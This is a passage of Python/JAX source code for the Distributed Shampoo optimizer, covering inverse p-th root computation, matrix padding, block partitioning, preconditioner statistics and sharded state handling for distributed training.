factor is used to bound the maximal allowed increase. return (i + 1, new_mat_m, new_mat_h, mat_h, new_error, new_error < error * 1.2) if matrix_size == 1: resultant_mat_h = (matrix + ridge_epsilon) ** alpha error = jnp.array(0, jnp.float32) else: damped_matrix = matrix + ridge_epsilon * identity z = (1 + p) / (2 * jnp.linalg.norm(damped_matrix)) new_mat_m_0 = damped_matrix * z new_error = jnp.max(jnp.abs(new_mat_m_0 - identity)) new_mat_h_0 = identity * jnp.power(z, 1.0 / p) init_state = tuple([0, new_mat_m_0, new_mat_h_0, new_mat_h_0, new_error, True]) _, mat_m, mat_h, old_mat_h, error, convergence = lax.while_loop( _iter_condition, _iter_body, init_state ) error = jnp.max(jnp.abs(mat_m - identity)).astype(jnp.float32) is_converged = jnp.asarray(convergence, old_mat_h.dtype) resultant_mat_h = is_converged * mat_h + (1 - is_converged) * old_mat_h resultant_mat_h = jnp.asarray(resultant_mat_h, orig_dtype) if lobpcg_topk_precondition > 0: # Since we deflated the top eigenvectors prior to p-th root inverse, # the resultant matrix has larger eigenvalues associated with those # same eigenvectors, which we need to now re-deflate. # # Note that _pth_root_difference returns positive values for this # particular argument ordering as min(eigvals) <= eigvals for the # jnp.sqrt below. 
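        # Concretely, pth_diff[i] ==
        #   (ridge_epsilon + min(eigvals))**(-1/p)
        #     - (ridge_epsilon + eigvals[i])**(-1/p)  >= 0,
        # i.e. exactly the excess that the deflated eigendirections picked up
        # in resultant_mat_h, which is subtracted back out below.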
pth_diff = _pth_root_difference(ridge_epsilon, jnp.min(eigvals), eigvals, p) scaled_vecs = eigvecs * jnp.sqrt(pth_diff) resultant_mat_h = ( resultant_mat_h.astype(scaled_vecs.dtype) - scaled_vecs.dot(scaled_vecs.T, precision=jax.lax.Precision.HIGHEST) ).astype(orig_dtype) mat_m = jnp.matmul( mat_power(resultant_mat_h, p), original_matrix, precision=jax.lax.Precision.HIGHEST, ) error = jnp.max(jnp.abs(mat_m - identity)).astype(jnp.float32) return resultant_mat_h, error def merge_small_dims(shape_to_merge, max_dim): """Merge small dimensions. If there are some small dimensions, we collapse them: e.g. [1, 2, 512, 1, 2048, 1, 3, 4] --> [1024, 2048, 12] if max_dim = 1024 [1, 2, 768, 1, 2048] --> [2, 768, 2048] Args: shape_to_merge: Shape to merge small dimensions. max_dim: Maximal dimension of output shape used in merging. Returns: Merged shape. """ if shape_to_merge and np.all(np.array(shape_to_merge) == 1): return [1] resulting_shape = [] product = 1 for d in shape_to_merge: if product * d <= max_dim: product *= d else: if product > 1: resulting_shape.append(product) product = d if product > 1: resulting_shape.append(product) return resulting_shape def pad_square_matrix(mat, max_size): """Pad a square matrix up to max_size. Args: mat: a matrix to pad. max_size: matrix size requested. Returns: Given M returns [[M, 0], [0, I]] """ rows, cols = mat.shape if rows != cols: raise ValueError( f"Must have rows == cols, instead got rows={rows}, cols={cols}" ) if cols > max_size: raise ValueError( f"Must have cols <= max_size. Instead got cols={cols}, max_size={max_size}." ) if rows == max_size: return mat pad_size = max_size - rows zs1 = jnp.zeros([rows, pad_size], dtype=mat.dtype) zs2 = jnp.zeros([pad_size, rows], dtype=mat.dtype) eye = jnp.eye(pad_size, dtype=mat.dtype) mat = jnp.concatenate([mat, zs1], 1) mat = jnp.concatenate([mat, jnp.concatenate([zs2, eye], 1)], 0) return mat def make_sliced_padding( symmetric_block_size, num_blocks, starting_block, dtype, ): """Returns padding for symmetric block matrix. Specifically, the padding is given concatenated rectangular matrices representing the lower-triangular rows below the starting block. For example, if we want to pad the symmetric matrix M = [[A, B^T] [B, C]], the desired output (in terms of the full matrix) with num_blocks = 4 is M_padded = [[A, B^T, 0, 0] [B, C, 0, 0] [0, 0, I, 0] 0, 0, 0, I]. We would represent M as the block matrix mat = [A, B, C]. In this form, the additional padding to provide has form [0, 0, I, 0, 0, 0, I] (only the lower triangular parts in the third and fourth rows). Args: symmetric_block_size: The size of each block. num_blocks: The total number of blocks. starting_block: The block where to start the padding. dtype: The type to use for the blocks. """ if starting_block == num_blocks: return jnp.zeros(shape=(symmetric_block_size, 0), dtype=dtype) blocks = [] for i in range(starting_block, num_blocks): blocks.append( jnp.zeros( shape=(symmetric_block_size, symmetric_block_size * i), dtype=dtype ) ) blocks.append(jnp.eye(symmetric_block_size, dtype=dtype)) return jnp.concatenate(blocks, axis=-1) def pad_block_symmetric_matrix( mat, symmetric_block_size, max_num_blocks, ): """Returns the padded blocked symmetric matrix. The size of the padded matrix will be: [symmetric_block_size, symmetric_block_size * max_num_blocks] The input matrix can either: - Be square with size less or equal to symmetric_block_size. 
In this case, mat will first be padded to a square matrix of size symmetric_block_size, and then be padded again up to the full size of the blocked matrix. - Be a rectangle with number of rows equal to block size. In this case, number of columns must be a multiple of number of rows, and the ratio must correspond to a block representation of a symmetric matrix. That is, the ratio must have form x * (x + 1) / 2. Here, x represents the number of block rows represented by the matrix. Args: mat: The input block matrix. symmetric_block_size: The size of blocks. max_num_blocks: The largest number of blocks to pad to. """ rows, cols = mat.shape if rows > symmetric_block_size: raise ValueError( "Must have rows <= symmetric_block_size. Instead got " f"rows={rows}, symmetric_block_size={symmetric_block_size}." ) if rows > cols: raise ValueError( f"Must have rows <= cols, instead got rows={rows}, cols={cols}." ) if cols > symmetric_block_size * max_num_blocks: raise ValueError( "Must have cols <= symmetric_block_size * max_num_blocks " f"Instead got cols={cols}, " f"symmetric_block_size={symmetric_block_size}, " f"max_num_blocks={max_num_blocks}." ) if rows < symmetric_block_size: mat = pad_square_matrix(mat, max_size=symmetric_block_size) # Update rows and cols after possibly padding in pad_square_matrix. rows, cols = mat.shape assert rows == symmetric_block_size assert cols % rows == 0 filled_blocks = cols // rows padding_blocks = make_sliced_padding( symmetric_block_size=symmetric_block_size, num_blocks=symmetric_matrices.num_blocks_from_total_blocks(max_num_blocks), starting_block=symmetric_matrices.num_blocks_from_total_blocks(filled_blocks), dtype=mat.dtype, ) return jnp.concatenate([mat, padding_blocks], axis=-1) def pad_vector(vec, max_size): """Pad a vector to a max_size. Args: vec: a vector to pad. max_size: matrix size requested. Returns: Given V returns [V, 0] """ size = vec.shape[0] assert size <= max_size if size == max_size: return vec pad_size = max_size - size zs1 = jnp.zeros([pad_size], dtype=vec.dtype) return jnp.concatenate([vec, zs1], 0) def efficient_cond(predicate, compute_fn, init_state, *args, **kwargs): """Avoids wasteful buffer allocation with XLA.""" def _iter_body(unused_state): results = compute_fn(*args, **kwargs) return tuple([False] + list(results)) def _iter_condition(state): return state[0] results = jax.lax.while_loop( _iter_condition, _iter_body, tuple([predicate] + init_state) ) return tuple(results[1:]) class BlockPartitioner: """Partitions a tensor into smaller tensors.""" def __init__(self, param, block_size): self._shape = param.shape self._splits = [] split_sizes = [] # We split params into smaller blocks. Here we store the metadata to make # that split. for i, d in enumerate(param.shape): if 0 < block_size < d: # d-1, otherwise split appends a 0-size array. 
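                # For example (hypothetical sizes): d = 700 with
                # block_size = 256 gives nsplit = 2, indices = [256, 512] and
                # sizes = [256, 256, 188], i.e. two full blocks plus the
                # remainder.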
nsplit = (d - 1) // block_size indices = (np.arange(nsplit, dtype=np.int32) + 1) * block_size sizes = np.ones(nsplit + 1, dtype=np.int32) * block_size sizes[-1] = d - indices[-1] self._splits.append((i, indices)) split_sizes.append(sizes) else: split_sizes.append(np.array([d], dtype=np.int32)) self._split_sizes = split_sizes def split_sizes(self): return self._split_sizes def partition(self, tensor): """Partition tensor into blocks.""" assert tensor.shape == self._shape tensors = [tensor] for i, indices in self._splits: tensors_local = [] for t in tensors: tensors_local.extend(jnp.split(t, indices_or_sections=indices, axis=i)) tensors = tensors_local return tensors def merge_partitions(self, partitions): """Merge partitions back to original shape.""" for i, indices in reversed(self._splits): n = len(indices) + 1 partial_merged_tensors = [] ind = 0 while ind < len(partitions): partial_merged_tensors.append( jnp.concatenate(partitions[ind : ind + n], axis=i) ) ind += n partitions = partial_merged_tensors assert len(partitions) == 1 return partitions[0] def gram_weighted_update(old_stats, g, axis, w1, w2, precision=None): """Updated statistics via weighted average with new Gram matrix. Returns w₁ R + w₂ Gᵀ G where R is `old_stats` and G is the matrix whose columns are the flattened slices of the tensor `g` along the given `axis`. (So, `old_stats` and the returned matrix have dimensions n x n where n = `g.shape[axis]`). Args: old_stats: Old statistics. g: Gradient tensor. axis: Axis along which to slice `g`. w1: Scalar weight for old statistics. w2: Scalar weight for new Gram matrix. precision: Optional precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) Returns: Weighted average of old and new statistics. """ axes = [i for i in range(g.ndim) if i != axis] gram_matrix = jnp.tensordot(g, g, axes=(axes, axes), precision=precision) return w1 * old_stats + w2 * gram_matrix class Preconditioner: """Compute statistics/shape from gradients for preconditioning.""" def __init__( self, param, block_size, merge_small_dims_block_size, best_effort_shape_interpretation, preconditioner_type=PreconditionerType.ALL, ): """Initializes the preconditioner. Args: param: parameter to precondition. block_size: Block size used to split param. merge_small_dims_block_size: Block size for merging dims. best_effort_shape_interpretation: Whether to collapse/merge dims together. preconditioner_type: Type of preconditioner to use. """ self._original_shape = param.shape self._transformed_shape = param.shape if best_effort_shape_interpretation: self._transformed_shape = merge_small_dims( self._original_shape, merge_small_dims_block_size ) reshaped_param = jnp.reshape(param, self._transformed_shape) self._partitioner = BlockPartitioner(reshaped_param, block_size) self._preconditioner_type = preconditioner_type def updated_statistics_from_grad( self, stats, grad, w1, w2, to_float=None, from_float=None, precision=None, ): """Update statistics from gradients. Args: stats: Old statistics or its Cholesky factor if `cholesky` is True. grad: Gradient to compute statistics from. w1: Weight for old statistics. w2: Weight for new statistics. to_float: Optional function for converting stats to floating point. from_float: Optional function for converting from floating point. 
precision: Optional precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) Returns: A list of updated gradient statistics for each partition. """ to_float = to_float if to_float is not None else (lambda x: x) from_float = from_float if from_float is not None else (lambda x: x) update = functools.partial(gram_weighted_update, precision=precision) reshaped_grad = jnp.reshape(grad, self._transformed_shape) partitioned_grads = self._partitioner.partition(reshaped_grad) new_stats = [] index = 0 for g in partitioned_grads: should_preconditioned_dims = self.should_precondition_dims() num_preconditioners = sum(should_preconditioned_dims) for axis in range(num_preconditioners): new_stat = update(to_float(stats[index]), g, axis, w1, w2) new_stats.append(from_float(new_stat)) index += 1 return new_stats def should_precondition_dims(self): """A vector containing indicator indicating if the dim is preconditioned.""" split_sizes = self._partitioner.split_sizes() rank = len(split_sizes) if self._preconditioner_type == PreconditionerType.ALL or rank <= 1: return [True] * rank else: return [True] * (rank - 1) + [False] def shapes_for_preconditioners(self): """Returns shape from statistics.""" split_sizes = self._partitioner.split_sizes() rank = len(split_sizes) # We ignore preconditioner types if rank == 1 preconditioner_shapes = [] for t in itertools.product(*split_sizes): if self._preconditioner_type == PreconditionerType.ALL or rank <= 1: preconditioner_shapes.extend([[d, d] for d in t]) else: preconditioner_shapes.extend([[d, d] for d in t[:-1]]) return preconditioner_shapes def exponent_for_preconditioner(self): """Returns exponent to use for inverse-pth root M^{-1/p}.""" should_preconditioned_dims = self.should_precondition_dims() num_preconditioners = sum(should_preconditioned_dims) return 2 * num_preconditioners def preconditioned_grad(self, grad, preconditioners): """Precondition the gradient. Args: grad: A gradient tensor to precondition. preconditioners: A list of preconditioners to apply. Returns: A preconditioned gradient. 
""" reshaped_grad = jnp.reshape(grad, self._transformed_shape) partitioned_grads = self._partitioner.partition(reshaped_grad) preconditioned_partitioned_grads = [] for i, g in enumerate(partitioned_grads): should_preconditioned_dims = self.should_precondition_dims() num_preconditioners = sum(should_preconditioned_dims) preconditioners_for_grad = preconditioners[ i * num_preconditioners : (i + 1) * num_preconditioners ] precond_g = g rank = len(g.shape) for j, precondition in enumerate(should_preconditioned_dims): if precondition: precond_g = jnp.tensordot( precond_g, preconditioners_for_grad[j], axes=[[0], [0]] ) else: precond_g = jnp.transpose(precond_g, axes=(*range(1, rank), 0)) preconditioned_partitioned_grads.append(precond_g) merged_grad = self._partitioner.merge_partitions( preconditioned_partitioned_grads ) return jnp.reshape(merged_grad, self._original_shape) def _convert_to_parameter_stats(global_stats, local_stat, convert_statistics=True): """Creates parameter stats from sharded stats.""" index_start = int(local_stat.index_start) index_end = int(len(local_stat.sizes)) + index_start statistics = global_stats.statistics[index_start:index_end, :, :] preconditioners = global_stats.preconditioners[index_start:index_end, :, :] new_statistics = [] new_preconditioners = [] for i, size in enumerate(local_stat.sizes): new_statistics.append(statistics[i][:size, :size]) new_preconditioners.append(preconditioners[i][:size, :size]) if not convert_statistics: new_statistics = None return ParameterStats( local_stat.diagonal_statistics, new_statistics, new_preconditioners, local_stat.diagonal_momentum, local_stat.momentum, local_stat.training_metrics, ) def _convert_from_parameter_stats(parameter_stats, local_stats): """Creates sharded stats from paramter stats.""" return LocalShardedParameterStats( parameter_stats.diagonal_statistics, parameter_stats.diagonal_momentum, parameter_stats.momentum, parameter_stats.training_metrics, local_stats.index_start, local_stats.sizes, ) def _add_error_into_local_stats(local_stats, errors, inverse_failure_threshold): """Adds errors back into local statistics.""" new_local_stats = [] for local_stat in local_stats: if local_stat.sizes: index_start = int(local_stat.index_start) index_end = int(len(local_stat.sizes)) + index_start per_stat_error = errors[index_start:index_end] else: per_stat_error = jnp.array(0, jnp.float32) if local_stat.sizes: per_stat_error = jnp.where( jnp.logical_and( per_stat_error > 0.0, per_stat_error != inverse_failure_threshold ), per_stat_error, local_stat.training_metrics.inverse_pth_root_errors, ) new_local_stats.append( LocalShardedParameterStats( local_stat.diagonal_statistics, local_stat.diagonal_momentum, local_stat.momentum, TrainingMetrics(per_stat_error), local_stat.index_start, local_stat.sizes, ) ) return new_local_stats def batch(x, num_devices): """Batch `x` so that so that leading axis is num_devices.""" n = len(x) b = int(n / num_devices) return jnp.stack([jnp.stack(x[idx : idx + b]) for idx in range(0, n, b)]) def unbatch(batched_values): """Unbatch values across leading axis and return a list of elements.""" b1, b2 = batched_values.shape[0], batched_values.shape[1] results = [] for v_array in jnp.split(batched_values, indices_or_sections=b1, axis=0): v_array = jnp.squeeze(v_array) # b2 = batches (number of preconditioner computation) per core. 
if b2 > 1: for v in jnp.split(v_array, indices_or_sections=b2, axis=0): results.append(jnp.squeeze(v)) else: results.append(v_array) return results def distributed_shampoo( learning_rate, block_size, beta1=0.9, beta2=0.999, diagonal_epsilon=1e-10, matrix_epsilon=1e-6, weight_decay=0.0, start_preconditioning_step=5, preconditioning_compute_steps=1, statistics_compute_steps=1, best_effort_shape_interpretation=True, graft_type=GraftingType.SGD, nesterov=True, exponent_override=0, # Pass pmap 'batch axis name' in pmap mode. batch_axis_name=None, ### Only set following 3 params in pjit/spmd mode. ### WARNING: Experimental statistics_partition_spec=None, preconditioner_partition_spec=None, num_devices_for_pjit=None, shard_optimizer_states=False, ### ### Experimental memory reduction mode best_effort_memory_usage_reduction=False, ### inverse_failure_threshold=0.1, moving_average_for_momentum=False, skip_preconditioning_dim_size_gt=4096, clip_by_scaled_gradient_norm=None, precision=lax.Precision.HIGHEST, tensordot_precision=None, relative_matrix_epsilon=True, merge_small_dims_block_size=4096, lobpcg_topk_precondition=0, lobpcg_max_iter=0, precondtioner_type=PreconditionerType.ALL, skip_preconditioning_rank_lt=1, decoupled_learning_rate=True, decoupled_weight_decay=False, ): """Distributed Shampoo optimizer. Distributed Shampoo is a second-order preconditioned method (concretely, a variant of full-matrix Adagrad), that provides significant convergence and wall-clock time improvements compared to conventional first-order methods, and that has been shown to scale to large state-of-the-art deep learning models. References: Scalable Second Order Optimization for Deep Learning, Rohan Anil, Vineet Gupta, Tomer Koren, Kevin Regan, Yoram Singer Preprint: https://arxiv.org/abs/2002.09018 Args: learning_rate: the step size used to update the parameters. block_size: Block size for large layers (if > 0). Preconditioning compute operation is cubic in the dimension of the tensor. Block size allows us to chunk the layers into sub-layers of maximal dimension dictated by this value. Use 128 as default (increase if you have compute budget). beta1: momentum parameter. beta2: second moment averaging parameter. diagonal_epsilon: epsilon for diagonal adagrad (only if layerwise grafting to AdaGrad is enabled). matrix_epsilon: epsilon to add to statistics before computing inverse pth root. If you are running in f32 precision for inverse pth root (recommended today) this can go upto 1e-6. If you have latest hardware with native f64 precision, set this upto 1e-12. weight_decay: Weight decay for regularization. start_preconditioning_step: When to start Shampoo update before which diagonal update is used. This is because we dont have enough information to do stable inverse. preconditioning_compute_steps: How often to compute preconditioner. Performance tuning params for controlling memory and compute requirements. Ideally set this and statistics_compute_steps params to 1. statistics_compute_steps: How often to compute statistics. best_effort_shape_interpretation: If there are some small dimensions, collapse them e.g. [1, 2, 512, 1, 2048, 1, 3, 4] --> [1024, 2048, 12] if block = 1024, [1, 2, 768, 1, 2048] --> [2, 768, 2048] graft_type: Grafting is a technique to fix the layerwise scale of Shampoo optimizer. This allows us to plugin the Shampoo optimizer into settings where SGD/AdaGrad is already well tuned. nesterov: Nesterov momentum. exponent_override: Override the exponent used in matrix inverse. 
batch_axis_name: labeled axis over pmap for data-parallel training the optimizer used for. statistics_partition_spec: PartitionSpec to be used in sharded mode. preconditioner_partition_spec: PartitionSpec to be used in sharded mode. num_devices_for_pjit: Number of devices to parallelize over when using pjit. shard_optimizer_states: Shard optimizer states to save memory in model parallel training. best_effort_memory_usage_reduction: Best effort memory usage reduction. - diagonal_statistics -> jnp.bfloat16 - momentum buffers (2x) -> jnp.int8 - statistics, preconditioners -> jnp.int16 + diagonals inverse_failure_threshold: numerics are hard and inverses fail sometimes; we determine that using this threshold. moving_average_for_momentum: Whether to use moving average for momentum instead of exponential moving average. skip_preconditioning_dim_size_gt: Skip if preconditioning dim size is greater than this value. clip_by_scaled_gradient_norm: Clip by scaled gradient norm (only useful when using RMSProp Grafting). precision: precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) tensordot_precision: Optional precision to use for the tensordot operation when computing statistics (e.g., G Gᵀ). Same options as `precision` above. relative_matrix_epsilon: Whether to use relative epsilon to the max eigen value when computing inverse-pth root. merge_small_dims_block_size: Used as the maximum block size to merge the shapes. lobpcg_topk_precondition: If nonzero, specifies the number of top eigenvectors to subtract out before performing LOBPCG. Note this makes relative_matrix_epsilon essentially free. lobpcg_max_iter: Number of LOBPCG iterations, if zero defaults to `lobpcg_topk_precondition`. precondtioner_type: Preconditioner type to select all, left only or right only preconditioners. skip_preconditioning_rank_lt: Skips preconditioning for parameters with rank less than this value. decoupled_learning_rate: If True, use decoupled learning rate, otherwise couple it with preconditioned gradient computation. (Default True) decoupled_weight_decay: If True, use decoupled weight decay, otherwise couple with weight decay. (Default False) Returns: a GradientTransformation. """ def _graft_type_has_diagonal_statistics(): """Returns True if using diagonal firt order method for grafting.""" return graft_type != GraftingType.SGD and graft_type != GraftingType.SQRT_N def quantized_dtype_for_momentum_buffers(var): return ( jnp.int8 if best_effort_memory_usage_reduction and len(var.shape) > 1 else jnp.float32 ) # Preconditioner and statistics are both stores as int16 in this mode. # We take out the diagonal to make quantization easier. def quantized_dtype_for_second_moment_statistics_buffers(): return ( jnp.int16 if best_effort_memory_usage_reduction and batch_axis_name else jnp.float32 ) # Preconditioner and statistics are both stores as int16 in this mode. # We take out the diagonal to make quantization easier. 
def quantized_dtype_for_second_moment_preconditioner_buffers(): return ( jnp.int16 if best_effort_memory_usage_reduction and batch_axis_name else jnp.float32 ) def _to_float(maybe_quantized): if isinstance(maybe_quantized, QuantizedValue): return maybe_quantized.to_float() else: return maybe_quantized def _maybe_quantize_statistics(statistics_list): return _maybe_quantize_matrices_with_dtype( statistics_list, quantized_dtype_for_second_moment_statistics_buffers() ) def _maybe_quantize_preconditioners(statistics_list): return _maybe_quantize_matrices_with_dtype( statistics_list, quantized_dtype_for_second_moment_preconditioner_buffers() ) def _maybe_quantize_matrices_with_dtype(statistics_list, quantized_dtype): if quantized_dtype != jnp.float32: return [ QuantizedValue.from_float_value( s, quantized_dtype, extract_diagonal=True ) for s in statistics_list ] else: return statistics_list def _maybe_dequantize_preconditioners(preconditioner_list): return _maybe_dequantize_matrices_with_dtype( preconditioner_list, quantized_dtype_for_second_moment_preconditioner_buffers(), ) def _maybe_dequantize_matrices_with_dtype(statistics_list, quantized_dtype): if quantized_dtype != jnp.float32: return [s.to_float() for s in statistics_list] else: return statistics_list def _quantize_diagonal_statistics(diagonal_statistics): return QuantizedValue.from_float_value(diagonal_statistics, jnp.float32) def _quantize_momentum(momentum_statistics): return QuantizedValue.from_float_value( momentum_statistics, quantized_dtype_for_momentum_buffers(momentum_statistics), ) def preconditioner_from_params(param): """Returns a Preconditioner object for given param.""" return Preconditioner( param, block_size, merge_small_dims_block_size, best_effort_shape_interpretation, precondtioner_type, ) def sharded_init_fn(params): """Returns optimizer state (for PJIT mode). Args: params: the parameters that should be updated. """ params_flat, treedef = jax.tree_flatten(params) # Find max size to pad to. 
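        # Every statistic/preconditioner below is created directly at
        # [max_size, max_size] (rather than its natural [s, s] size) so that
        # all of them can later be stacked into a single global array whose
        # leading axis is sharded across devices.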
max_size = 0 for param in params_flat: preconditioner = preconditioner_from_params(param) if not _skip_preconditioning(param): shapes = preconditioner.shapes_for_preconditioners() sizes = [s[0] for s in shapes] max_size = max(max(sizes), max_size) padded_statistics = [] padded_preconditioners = [] local_stats_flat = [] exponents = [] for param in params_flat: preconditioner = preconditioner_from_params(param) shapes = preconditioner.shapes_for_preconditioners() sizes = [] statistics = [] preconditioners = [] index_start = len(padded_statistics) if not _skip_preconditioning(param): sizes = [s[0] for s in shapes] shapes = preconditioner.shapes_for_preconditioners() statistics = [ matrix_epsilon * jnp.eye(max_size, dtype=jnp.float32) for s in shapes ] preconditioners = [jnp.eye(max_size, dtype=jnp.float32) for s in shapes] padded_statistics.extend(statistics) padded_preconditioners.extend(preconditioners) exponent = ( preconditioner.exponent_for_preconditioner() if exponent_override == 0 else exponent_override ) exponents.extend([exponent] * len(shapes)) diagonal_statistics = _quantize_diagonal_statistics(jnp.zeros_like(param)) diagonal_momentum = _quantize_momentum(jnp.zeros_like(param)) momentum = _quantize_momentum(jnp.zeros_like(param)) local_stats_flat.append( LocalShardedParameterStats( diagonal_statistics, diagonal_momentum, momentum, init_training_metrics(len(sizes)), index_start, sizes, ) ) local_stats = jax.tree_unflatten(treedef, local_stats_flat) to_pad = -len(padded_statistics) % num_devices_for_pjit if max_size == 0: to_pad = num_devices_for_pjit max_size = block_size stat_dtype = jnp.float32 else: stat_dtype = padded_statistics[0].dtype # Pad the statistics and preconditioner matrices to be a multiple of # num devices. # TODO(rohananil): Relax to only the size of the mesh axis where the dim # is split on. padded_statistics.extend( [jnp.eye(max_size, dtype=stat_dtype) for _ in range(to_pad)] ) padded_preconditioners.extend( [jnp.eye(max_size, dtype=stat_dtype) for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) global_stats = GlobalShardedParameterStats( jnp.stack(padded_statistics), jnp.stack(padded_preconditioners), jnp.stack(exponents), ) return ShampooState( count=jnp.zeros([], jnp.int32), stats=ShardedShampooStats(global_stats, local_stats), ) def _max_statistics_size_from_params(params): max_size = 0 for param in params: param_clone = jnp.zeros(param.shape, dtype=param.dtype) preconditioner = preconditioner_from_params(param_clone) if not _skip_preconditioning(param): shapes = preconditioner.shapes_for_preconditioners() sizes = [s[0] for s in shapes] max_size = max(max(sizes), max_size) return max_size def _remove_leading_sharding_annotation(pspec): """Mapping from N-d to (N-1)-d, used for quantization, factoring etc.""" # None and PSpec(None) are valid PSpecs. if pspec and len(pspec) > 1: return pjit.PartitionSpec(*pspec[1:]) else: return [] def sharded_init_partition_spec_fn( params, params_partition_spec, partition_spec_for_statistics ): """Returns a parallel state tree with PartitionSpec associated with state. Args: params: A pytree with params. params_partition_spec: A pytree with PartitionSpec for params. partition_spec_for_statistics: PartitionSpec for the statistics. """ # Parallel lists of spec, and params. param_pspec_flat, _ = jax.tree_flatten( params_partition_spec, is_leaf=lambda x: x is None ) params_flat, treedef = jax.tree_flatten(params) assert param_pspec_flat assert params_flat # Step is replicated across cores. # None means cores. 
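        # This mirrors the state structure built by sharded_init_fn, but every
        # leaf holds a PartitionSpec instead of an array; scale tensors of
        # quantized values drop the leading sharding axis via
        # _remove_leading_sharding_annotation.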
local_stats_flat = [] num_statistics = 0 for param, param_pspec in zip(params_flat, param_pspec_flat): param_clone = jnp.zeros(param.shape, dtype=param.dtype) preconditioner = preconditioner_from_params(param_clone) shapes = preconditioner.shapes_for_preconditioners() sizes = [] index_start = num_statistics if not _skip_preconditioning(param): sizes = [s[0] for s in shapes] shapes = preconditioner.shapes_for_preconditioners() num_statistics += len(shapes) qdtype = quantized_dtype_for_momentum_buffers(param) m1_pspec = param_pspec m2_pspec = param_pspec m1_scale_pspec = [] m2_scale_pspec = [] if qdtype != jnp.float32: m1_scale_pspec = _remove_leading_sharding_annotation(m1_pspec) m2_scale_pspec = _remove_leading_sharding_annotation(m2_pspec) local_stats_flat.append( LocalShardedParameterStats( QuantizedValue( param_pspec, [], [], jnp.float32, False, list(param.shape) ), QuantizedValue( m1_pspec, [], m1_scale_pspec, qdtype, False, list(param.shape) ), QuantizedValue( m2_pspec, [], m2_scale_pspec, qdtype, False, list(param.shape) ), init_training_metrics_pspec(), index_start, sizes, ) ) local_stats = jax.tree_unflatten(treedef, local_stats_flat) global_stats = GlobalShardedParameterStats( partition_spec_for_statistics, partition_spec_for_statistics, pjit.PartitionSpec(), ) count_pspec = pjit.PartitionSpec() return ShampooState( count=count_pspec, stats=ShardedShampooStats(global_stats, local_stats) ) def sharded_init_shape_and_dtype_fn(params): """Returns a parallel state tree with shape, dtype associated with state. Args: params: A pytree with params. """ # Parallel lists of spec, and params. params_flat, treedef = jax.tree_flatten(params) assert params_flat # Step is replicated across cores. # None means cores. local_stats_flat = [] num_statistics = 0 for param in params_flat: param_clone = jnp.zeros(param.shape, dtype=param.dtype) preconditioner = preconditioner_from_params(param_clone) shapes = preconditioner.shapes_for_preconditioners() sizes = [] index_start = num_statistics if not _skip_preconditioning(param): sizes = [s[0] for s in shapes] shapes = preconditioner.shapes_for_preconditioners() num_statistics += len(shapes) qdtype = quantized_dtype_for_momentum_buffers(param) m1_shape_and_dtype = [list(param.shape), param.dtype] m2_shape_and_dtype = [list(param.shape), param.dtype] m1_scale_shape_and_dtype = [] m2_scale_shape_and_dtype = [] if qdtype != jnp.float32: m1_scale_shape_and_dtype = [list(param.shape)[1:], qdtype] m2_scale_shape_and_dtype = [list(param.shape)[1:], qdtype] diagonal_statistics_shape_and_dtype = [list(param.shape), param.dtype] local_stats_flat.append( LocalShardedParameterStats( QuantizedValue( diagonal_statistics_shape_and_dtype, [], [], jnp.float32, False, list(param.shape), ), QuantizedValue( m1_shape_and_dtype, [], m1_scale_shape_and_dtype, qdtype, False, list(param.shape), ), QuantizedValue( m2_shape_and_dtype, [], m2_scale_shape_and_dtype, qdtype, False, list(param.shape), ), init_training_metrics_shapes(len(sizes)), index_start, sizes, ) ) local_stats = jax.tree_unflatten(treedef, local_stats_flat) max_statistics_size = _max_statistics_size_from_params(params_flat) to_pad = -num_statistics % num_devices_for_pjit num_statistics += to_pad if num_statistics == 0: num_statistics = num_devices_for_pjit max_statistics_size = block_size statistics_shape = [num_statistics, max_statistics_size, max_statistics_size] global_stats = GlobalShardedParameterStats( [statistics_shape, jnp.float32], [statistics_shape, jnp.float32], [[num_statistics], jnp.int32], ) return 
ShampooState( count=[[], jnp.float32], stats=ShardedShampooStats(global_stats, local_stats), ) def sharded_update_fn(grads, state, params): """Transform the input gradient and update all statistics in sharded mode. Args: grads: the gradient tensors for the parameters. state: a named tuple containing the state of the optimizer params: the parameters that should be updated. Returns: A tuple containing the new parameters and the new optimizer state. """ params_flat, treedef = jax.tree_flatten(params) grads_flat = treedef.flatten_up_to(grads) global_stats = state.stats.global_stats local_stats_flat = treedef.flatten_up_to(state.stats.local_stats) stats_flat = [ _convert_to_parameter_stats(global_stats, local_stat) for local_stat in local_stats_flat ] new_stats_flat = jax.tree_map( lambda g, s, p: _compute_stats(g, s, p, state.count), grads_flat, stats_flat, params_flat, ) outputs = jax.tree_map( lambda g, s, p: _transform_grad(g, s, p, state.count), grads_flat, new_stats_flat, params_flat, ) updates_flat, new_stats_flat = list(zip(*outputs)) if outputs else ((), ()) updates = jax.tree_unflatten(treedef, updates_flat) # Create new local_stats new_local_stats_flat = [ _convert_from_parameter_stats(new_stat, local_stat) for new_stat, local_stat in zip(new_stats_flat, local_stats_flat) ] max_size = global_stats.statistics.shape[1] new_padded_statistics = [] for stat in new_stats_flat: new_padded_statistics.extend( [pad_square_matrix(stat, max_size) for stat in stat.statistics] ) # Create global stats # TODO(rohananil): Preconditioner is not updated every step, so cost of # stack/pad can be obviated away. # Pad the statistics and preconditioner matrices to be a multiple of # num devices. # TODO(rohananil): Relax to only the size of the mesh axis where the dim # is split on. to_pad = -len(new_padded_statistics) % num_devices_for_pjit if not new_padded_statistics: to_pad = num_devices_for_pjit stat_dtype = jnp.float32 else: stat_dtype = new_padded_statistics[0].dtype new_padded_statistics.extend( [jnp.eye(max_size, dtype=stat_dtype) for _ in range(to_pad)] ) new_stacked_padded_statistics = jnp.stack(new_padded_statistics) new_stacked_padded_statistics = pjit.with_sharding_constraint( new_stacked_padded_statistics, statistics_partition_spec ) def _internal_inverse_pth_root_all(): preconditioners, errors = _matrix_inverse_pth_root_pjit( new_stacked_padded_statistics, global_stats.exponents, statistics_partition_spec, ) return preconditioners, errors if preconditioning_compute_steps == 1: new_preconditioners, errors = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners 